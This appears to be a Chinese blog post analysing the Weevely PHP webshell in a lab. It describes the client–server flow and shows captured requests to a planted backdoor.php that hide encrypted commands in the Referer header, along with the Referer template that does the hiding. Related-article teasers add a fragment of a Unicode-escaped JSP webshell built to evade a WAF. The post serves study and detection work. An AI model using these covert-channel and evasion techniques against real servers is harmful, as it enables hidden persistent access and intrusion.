Weevely使用及源码分析(二)

最新推荐文章于 2024-06-04 13:40:29 发布
最新推荐文章于 2024-06-04 13:40:29 发布
阅读量2.8k 收藏 1
点赞数 3
分类专栏: Weevely 文章标签: php wireshark 源码 weevely 后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yaofeiNO1/article/details/54409496
版权
本文深入分析了Weevely工具的两种PHP模板(stegaref_php.tpl和legacycookie_php.tpl)的后门机制,包括协议交互、数据包结构、加密payload解密过程。通过Wireshark抓包,展示了请求包和响应包的内容,并详细解释了数据包载荷如何在Referer头和Cookie中隐藏。通过对Weevely源码的分析,揭示了webshell控制通道的工作原理和核心函数send()的流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 定义(术语、名词解释)

   客户端:运行Weevely进程的计算机。
   服务端:存有PHP木马的服务器。

2. 协议交互流程

   在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。

3. 数据包及源码分析

   通过对源代码进行走读以及wireshark进行抓包分析,可以看出Weevely主要生成的php后门文件主要有三种模板:stegaref_php.tpl,legacycookie_php.tpl,stegaref_php_debug.tpl。其中stegaref_php.tpl与stegaref_php_debug.tpl两种php模板类似,主要特点是返回的response_body中的标签stegaref_php.tpl为<连接密码md5加密前八位>标签,stegaref_php_debug.tpl为:<连接密码md5加密前八位+DEBUG>标签,同时响应体中的内容stegaref_php_debug.tpl模板把主要的有用数据字段全都显示出来了,主要用于前期debug使用,所以本文档主要分析了stegaref_php.tpl和legacycookie_php.tpl两种使用模板。

3.1 stegaref_php.tpl模板

   以ip为136的kali虚拟机为客户端对含有后门文件的ip为137的kali虚拟机作为服务器进行远程连接。连接成功后在客户端命令行中输入命令whoami查看回显内容。通过Wireshark我们抓取到了两个TCP数据流。分别为:

3.1.1 请求包

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: uk-UA,mi;q=0.5,mt;q=0.7,mk;q=0.8
Host: 192.168.182.137
Accept: text/html,text/plain;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
Connection: close
Referer: http://www.google.bt/url?sa=t&rct=j&q=168.182.137&source=web&cd=799&ved=bd6Tfh__3&url=168.182&ei=z5HrNlsxt6GOIdThqz-xn9&usg=_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHND

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。|

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: ur-PK,mh;q=0.4
Connection: close
Accept: text/html,application/xml;0.9,*/*
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Host: 192.168.182.137
Cookie: PHPSESSID=fkdt4fv5tkn3q2hnhp10rv65o5
Referer: http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=hiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。

   通过对Weevely源码进行分析,确定数据包格式主要通过7种不同的构造Referer数据报头方法进行对加密的payload进行填充。Referer头格式为:

http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload_chunk(34) }
h
最低0.47元/天 解锁文章
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1067
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
亲测WAF防御能力评测及工具
weixin_49440873的博客
07-17 1001
某网站后台可以编辑网站模板,但不存在上传漏洞,由于JSP 的content-type 类型为 text/html,故利用这个特性 采用html中的Unicode 16进制编码成功上传。 <%@ page import=“java.util.,java.io.,java.net.*”%> <%@ page import="java.util.*,java.io.*,java.net.*"%> <% \u0069\u0066\u0020\u0028\u0072\u0065\u00
Weevely使用源码分析(三)
fly小灰灰的专栏
01-30 1857
1 weevely验证机制分析 1.1 源码分析    当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels
Weevely使用源码分析(一)
fly小灰灰的专栏
01-30 2619
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资源搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3593
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
Shelly:带Python的简单后门管理器(基于weevely
02-05
雪莉| 使用Python的简单后门管理器(基于weevely) Shelly是使用Python编写的简单工具,其功能是远程访问网站 安装: $ git clone $ cd雪莉$ python3 shell.py 要求 : sudo pip install -r requirements.txt 范例: python3 shell.py -g wp-log -p tegal1337 ______ ____ / __/ / ___ / / __ __ _\ \/ _ / -_/ / / // / /___/_//_\__/_/_/\_, /
Weevely
Nixawk
07-31 2054
Weevely 出现已经有一段时间了, 今天
weevely3.3.1:Weevely旧版本(3.3.1)
03-25
韦韦利 Weevely是一个命令行Web Shell,可在运行时通过网络动态扩展,旨在用于远程管理和渗透测试。 它提供了一个类似ssh的终端,即使在受限的环境中,也只需将PHP脚本拖放到目标服务器上。 低资源占用的代理程序和30多个模块构成了一个可扩展的框架,用于管理Web帐户并发布漏洞利用Web服务器以提升特权并在网络中横向移动。 阅读中的教程和用例。 模块功能: 类SSH终端 在目标上运行SQL控制台透视 代理以目标为中心的HTTP流量 主机配置安全审核 在本地挂载目标文件系统 进行以目标为中心的网络扫描 文件上传下载 生成反向和直接TCP Shell Bruteforce内部服务 管理压缩档案 后门代理 远程代理是一个小PHP脚本,可以在运行时通过网络扩展其功能。 代理代码是多态的,几乎无法被AV检测到,并且流量在HTTP请求中被混淆。 模块开发 Weevely还提供了py
入侵检测——weevely
LainWith的博客
08-26 756
这里写目录标题介绍使用环境生成webshell上传webshell连接webshell命令执行编写规则4.0.1版本1.1版本规则参考 介绍 Weevely工具Python语言编写,集生成木马与加连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大,支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了,但是生成的木马文件仍然进行了加密处理。 ​ 在实操过程中发现,使用weevely生成的webshe
实战Webshell管理工具Weevely检测思路分析
2401_84466229的博客
06-04 897
根据固定长度计算方法:16(随机字符)+ 12(秘钥)+ len(X) + 12(秘钥)+ 16(随机字符)可知Content-Length值为:83/80/79,此处证明了之前的猜想是成立的。第三步:Client通过解密函数utils.sting.sxor()、zlib.decompress()、base64.b64decode()对接收服务端响应的body字符串进行解密,并判断字符串是否和send()函数发送到服务端的“X”值相同,从而判断客户端与服务端是否能够成功建立通信。此教程为纯技术分享!
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
WeevelyPHP加密模块
01-26
WeevelyPHP加密模块,分离出的
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4887
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
weevely工具使用
淡巴枯的博客
05-23 7145
weevely工具使用 目录一. 关于weevely. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
Weevely工具使用详解 (Linux菜刀)
weixin_45116657的博客
04-10 3414
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
使用过程】weevely生成、上传、连接、执行…你一定行
03-31 7996
weevely傻子都会
WebShell基础详解(特点、原理、分类、工具)
热门推荐
诚邀网络通信领域商务合作
01-07 1万+
文章目录一、WebShell简介、WebShell特点三、WebShell分类四、WebShell原理五、内存马六、WebShell管理工具 一、WebShell简介 Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。 “web”的含义是显然 需要服务器开放web服务,“shell”的含义是 取得对服务器某种程度上操作权限。 webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 由于webshell其大多..
菜刀php木马_Weevelyphp菜刀)工具使用详解
weixin_36205101的博客
03-09 1220
-前言weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。项目地址:https://github.com/epinna/Weevely下面就针对该工具...
分离Weevely加密模块加密任意WebShell
blrk
03-22 1227
http://www.freebuf.com/tools/7875.html
webshell下载
最新发布
01-19
### 获取和使用WebShell的安全注意事项 对于渗透测试人员来说,在合法授权的情况下,获取并使用WebShell进行安全评估是一项复杂的工作。重要的是要确保操作完全符合法律框架,并获得适当许可。 #### 合法途径获取WebShell工具 为了研究目的或内部安全性审查,建议通过官方渠道下载知名的开源项目来构建自己的WebShell环境。例如,可以从GitHub仓库克隆知名且评价良好的项目[^1]: ```bash git clone https://github.com/breaktoprotect/webshell.git ``` 这允许团队成员共同维护代码库的同时也便于审计其源码质量。 #### 使用前准备 在部署任何类型的WebShell之前,务必确认服务器端已安装相应编程语言运行时环境。由于PHP是最常用的WebShell编写语言之一,因此通常需要配置好支持PHP解析的服务平台,如LAMP/WAMP堆栈下的Apache/Nginx加PHP-FPM组合。 #### 安全措施与最佳实践 - **隔离测试环境**:创建独立于生产系统的虚拟机或容器实例作为实验场地。 - **访问控制列表(ACLs)设置**:严格限制谁能接触这些资源及其权限范围。 - **日志记录与监控**:启用详细的HTTP请求/响应跟踪机制以便事后分析异常行为模式。 - **定期更新补丁程序**:保持所有软件组件处于最新状态以修补潜在漏洞。 #### 工具选择指南 当挑选具体使用的WebShell客户端应用时,可以考虑功能特性、易用性和社区活跃度等因素。像“冰蝎”这样的国产工具提供了图形界面友好型的操作面板,适合初学者快速上手;而Weevely则以其轻量化设计著称,适用于更隐蔽的任务场景[^2][^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值